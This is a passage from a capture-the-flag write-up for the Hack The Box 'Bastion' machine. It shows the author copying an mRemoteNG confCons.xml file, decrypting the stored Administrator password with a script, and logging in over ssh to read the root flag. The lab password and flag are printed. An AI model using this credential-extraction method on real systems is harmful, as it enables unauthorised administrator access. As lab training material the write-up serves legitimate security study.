22-02-2019  15:02             6.218 confCons.xml.20190222-1402379227.backup                                                     
22-02-2019  15:02             6.231 confCons.xml.20190222-1403070644.backup                                                     
22-02-2019  15:03             6.319 confCons.xml.20190222-1403100488.backup                                                     
22-02-2019  15:03             6.318 confCons.xml.20190222-1403220026.backup                                                     
22-02-2019  15:03             6.315 confCons.xml.20190222-1403261268.backup                                                     
22-02-2019  15:03             6.316 confCons.xml.20190222-1403272831.backup                                                     
22-02-2019  15:03             6.315 confCons.xml.20190222-1403433299.backup                                                     
22-02-2019  15:03             6.316 confCons.xml.20190222-1403486580.backup                                                     
22-02-2019  15:03                51 extApps.xml                                                                                 
22-02-2019  15:03             5.217 mRemoteNG.log                                                                               
22-02-2019  15:03             2.245 pnlLayout.xml                                                                               
22-02-2019  15:01    <DIR>          Themes                                                                                      
              14 File(s)         76.577 bytes                                                                                   
               3 Dir(s)  11.295.985.664 bytes free                                                                              

l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>    

Lets use scp to get the confCons.xml

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ scp l4mpje@bastion.htb:/Users/L4mpje/AppData/Roaming/mRemoteNG/confCons.xml .
l4mpje@bastion.htb's password: 
confCons.xml                                                                                                                                                                                               100% 6316    38.2KB/s   00:00    
                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ cat confCons.xml 
<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" ConfVersion="2.6">
    <Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true" DisplayWallpaper="false" DisplayThemes="false" EnableFontSmoothing="false" EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" RedirectPorts="false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPlay" SoundQuality="Dynamic" RedirectKeys="false" Connected="false" PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp="" VNCCompression="CompNone" VNCEncoding="EncHextile" VNCAuthMode="AuthVNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0" VNCProxyUsername="" VNCProxyPassword="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnly="false" RDGatewayUsageMethod="Never" RDGatewayHostname="" RDGatewayUseConnectionCredentials="Yes" RDGatewayUsername="" RDGatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="false" InheritColors="false" InheritDescription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnableFontSmoothing="false" InheritEnableDesktopComposition="false" InheritDomain="false" InheritIcon="false" InheritPanel="false" InheritPassword="false" InheritPort="false" InheritProtocol="false" InheritPuttySession="false" InheritRedirectDiskDrives="false" InheritRedirectKeys="false" InheritRedirectPorts="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false" InheritRedirectSound="false" InheritSoundQuality="false" InheritResolution="false" InheritAutomaticResize="false" InheritUseConsoleSession="false" InheritUseCredSsp="false" InheritRenderingEngine="false" InheritUsername="false" InheritICAEncryptionStrength="false" InheritRDPAuthenticationLevel="false" InheritRDPMinutesToIdleTimeout="false" InheritRDPAlertIdleTimeout="false" InheritLoadBalanceInfo="false" InheritPreExtApp="false" InheritPostExtApp="false" InheritMacAddress="false" InheritUserField="false" InheritExtApp="false" InheritVNCCompression="false" InheritVNCEncoding="false" InheritVNCAuthMode="false" InheritVNCProxyType="false" InheritVNCProxyIP="false" InheritVNCProxyPort="false" InheritVNCProxyUsername="false" InheritVNCProxyPassword="false" InheritVNCColors="false" InheritVNCSmartSizeMode="false" InheritVNCViewOnly="false" InheritRDGatewayUsageMethod="false" InheritRDGatewayHostname="false" InheritRDGatewayUseConnectionCredentials="false" InheritRDGatewayUsername="false" InheritRDGatewayPassword="false" InheritRDGatewayDomain="false" />
    <Node Name="L4mpje-PC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="8d3579b2-e68e-48c1-8f0f-9ee1347c9128" Username="L4mpje" Domain="" Password="yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB" Hostname="192.168.1.75" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true" DisplayWallpaper="false" DisplayThemes="false" EnableFontSmoothing="false" EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" RedirectPorts="false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPlay" SoundQuality="Dynamic" RedirectKeys="false" Connected="false" PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp="" VNCCompression="CompNone" VNCEncoding="EncHextile" VNCAuthMode="AuthVNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0" VNCProxyUsername="" VNCProxyPassword="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnly="false" RDGatewayUsageMethod="Never" RDGatewayHostname="" RDGatewayUseConnectionCredentials="Yes" RDGatewayUsername="" RDGatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="false" InheritColors="false" InheritDescription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnableFontSmoothing="false" InheritEnableDesktopComposition="false" InheritDomain="false" InheritIcon="false" InheritPanel="false" InheritPassword="false" InheritPort="false" InheritProtocol="false" InheritPuttySession="false" InheritRedirectDiskDrives="false" InheritRedirectKeys="false" InheritRedirectPorts="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false" InheritRedirectSound="false" InheritSoundQuality="false" InheritResolution="false" InheritAutomaticResize="false" InheritUseConsoleSession="false" InheritUseCredSsp="false" InheritRenderingEngine="false" InheritUsername="false" InheritICAEncryptionStrength="false" InheritRDPAuthenticationLevel="false" InheritRDPMinutesToIdleTimeout="false" InheritRDPAlertIdleTimeout="false" InheritLoadBalanceInfo="false" InheritPreExtApp="false" InheritPostExtApp="false" InheritMacAddress="false" InheritUserField="false" InheritExtApp="false" InheritVNCCompression="false" InheritVNCEncoding="false" InheritVNCAuthMode="false" InheritVNCProxyType="false" InheritVNCProxyIP="false" InheritVNCProxyPort="false" InheritVNCProxyUsername="false" InheritVNCProxyPassword="false" InheritVNCColors="false" InheritVNCSmartSizeMode="false" InheritVNCViewOnly="false" InheritRDGatewayUsageMethod="false" InheritRDGatewayHostname="false" InheritRDGatewayUseConnectionCredentials="false" InheritRDGatewayUsername="false" InheritRDGatewayPassword="false" InheritRDGatewayDomain="false" />
</mrng:Connections>                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ 

Examine the confCons.xml we get the following information

 <Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic"

The password is base64 but we are not able to read, the documentation says about script that does this magic for mRemoteNG

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ python3 mremoteNG.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="                                                                                                                 130 
Password: thXLHM96BeKL0ER2

Now we have admin password, lets get root flag.

                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ ssh administrator@bastion.htb                                                                                                                                                                                                        1 
administrator@bastion.htb's password: 

Microsoft Windows [Version 10.0.14393]                                                                                          
(c) 2016 Microsoft Corporation. All rights reserved.                                                                            

administrator@BASTION C:\Users\Administrator>dir                                                                                
 Volume in drive C has no label.                                                                                                
 Volume Serial Number is 0CB3-C487                                                                                              

 Directory of C:\Users\Administrator                                                                                            

25-04-2019  06:08    <DIR>          .                                                                                           
25-04-2019  06:08    <DIR>          ..                                                                                          
23-02-2019  10:40    <DIR>          Contacts                                                                                    
23-02-2019  10:40    <DIR>          Desktop                                                                                     
23-02-2019  10:40    <DIR>          Documents                                                                                   
23-02-2019  10:40    <DIR>          Downloads                                                                                   
23-02-2019  10:40    <DIR>          Favorites                                                                                   
23-02-2019  10:40    <DIR>          Links                                                                                       
23-02-2019  10:40    <DIR>          Music                                                                                       
23-02-2019  10:40    <DIR>          Pictures                                                                                    
23-02-2019  10:40    <DIR>          Saved Games                                                                                 
23-02-2019  10:40    <DIR>          Searches                                                                                    
23-02-2019  10:40    <DIR>          Videos                                                                                      
               0 File(s)              0 bytes                                                                                   
              13 Dir(s)  11.295.739.904 bytes free                                                                              

administrator@BASTION C:\Users\Administrator>cd desktop                                                                         

administrator@BASTION C:\Users\Administrator\Desktop>dir                                                                        
 Volume in drive C has no label.                                                                                                
 Volume Serial Number is 0CB3-C487                                                                                              

 Directory of C:\Users\Administrator\Desktop                                                                                    

23-02-2019  10:40    <DIR>          .                                                                                           
23-02-2019  10:40    <DIR>          ..                                                                                          
23-02-2019  10:07                32 root.txt                                                                                    
               1 File(s)             32 bytes                                                                                   
               2 Dir(s)  11.295.739.904 bytes free                                                                              

administrator@BASTION C:\Users\Administrator\Desktop>type root.txt                                                              
958850b91811676ed6620a9c430e65c8                                                                                                
administrator@BASTION C:\Users\Administrator\Desktop>     

We will try to include topics of learning for each writeup going forward, and update same here too.

LEAVE A REPLY

Please enter your comment!
Please enter your name here